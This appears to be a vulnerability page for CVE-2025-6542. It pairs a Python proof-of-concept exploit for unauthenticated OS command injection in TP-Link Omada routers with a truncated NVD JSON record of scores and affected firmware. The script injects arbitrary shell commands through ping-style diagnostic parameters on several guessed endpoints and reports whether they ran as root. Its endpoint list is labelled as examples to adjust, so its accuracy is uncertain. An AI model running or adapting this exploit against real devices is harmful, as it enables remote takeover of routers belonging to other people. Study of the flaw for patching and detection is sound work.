CVE-2025-6542

# CVE-2025-6542 - TP-Link Omada Router RCE PoC # Vulnerability: Unauthenticated Remote OS Command Injection # CVSS: 9.8 (Critical) import requests import sys import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def exploit(target_url, cmd="id"): """ Exploit CVE-2025-6542: Unauthenticated OS command injection in TP-Link Omada routers and SOHO Festa gateways. """ target_url = target_url.rstrip('/') # Inject OS command via vulnerable parameter # The payload uses shell metacharacters to chain arbitrary commands payload = f";{cmd}" # Example vulnerable endpoint (adjust based on target firmware) vulnerable_endpoints = [ f"{target_url}/cgi-bin/luci/;stok=/admin/diagnostic", f"{target_url}/api/v1/diagnostic/tools", f"{target_url}/cgi-bin/luci/;stok=/api/diagnostic" ] headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-6542)", "Content-Type": "application/x-www-form-urlencoded", "Referer": target_url } # Command injection via ping/trace diagnostic parameters data = { "ip": f"127.0.0.1{payload}", "host": f"127.0.0.1{payload}", "target": f"127.0.0.1{payload}", "address": f"127.0.0.1{payload}" } for endpoint in vulnerable_endpoints: try: print(f"[*] Trying endpoint: {endpoint}") response = requests.post( endpoint, data=data, headers=headers, verify=False, timeout=10 ) if response.status_code == 200 and ("uid=" in response.text or "root" in response.text): print(f"[+] Command executed successfully!") print(f"[+] Output: {response.text}") return response.text except Exception as e: print(f"[-] Error: {e}") continue print("[-] Exploitation failed - target may be patched") return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url> [command]") print(f"Example: {sys.argv[0]} https://192.168.0.1 'id'") sys.exit(1) target = sys.argv[1] command = sys.argv[2] if len(sys.argv) > 2 else "id" exploit(target, command)

{"cve": {"id": "CVE-2025-6542", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2025-10-21T01:15:37.063", "lastModified": "2025-10-24T13:50:10.897", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary OS command may be executed on the product by a remote unauthenticated attacker."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er8411_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.3", "matchCriteriaId": "EE0D8327-33EE-4EF0-BC2F-F2A16D55762A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er8411_firmware:1.3.3:-:*:*:*:*:*:*", "matchCriteriaId": "6DB13EF6-0930-4575-92DC-AF431B2A2CEF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:er8411:-:*:*:*:*:*:*:*", "matchCriteriaId": "4F2F16D8-5D7B-4E01-8BB3-F324B6011F72"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er7412-m2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.0", "matchCriteriaId": "14CE8275-E546-4598-901C-F52355DED3C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er7412-m2_firmware:1.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "B79E0763-6D6F-4E59-91FC-D397A8BEF0F1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:er7412-m2:-:*:*:*:*:*:*:*", "matchCriteriaId": "FBB89DAE-6264-4F26-B34A-E1B84FB927D4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er707-m2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.1", "matchCriteriaId": "48EDBC5B-BA54-4D11-9391-4FA7C7D4F5E7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er707-m2_firmware:1.3.1:-:*:*:*:*:*:*", "matchCriteriaId": "359ADA2C-F1A5-4840-8F84-2DBA8F4573C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:er707-m2:-:*:*:*:*:*:*:*", "matchCriteriaId": "E45AF81F-1346-4FD8-9E38-CAB330D79AB6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er7206_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.2", "matchCriteriaId": "AF595A8A-72CF-406E-BB0C-B76FDD51150B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er7206_firmware:2.2.2:-:*:*:*:*:*:*", "matchCriteriaId": "8F66B05E-0D03-4B59-BCA3-7A2F40F092EE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:er7206:-:*:*:*:*:*:*:*", "matchCriteriaId": "EB65324D-FD72-4C28-92AF-85BFF1E8A993"}]}]}, {"operator": " ... (truncated)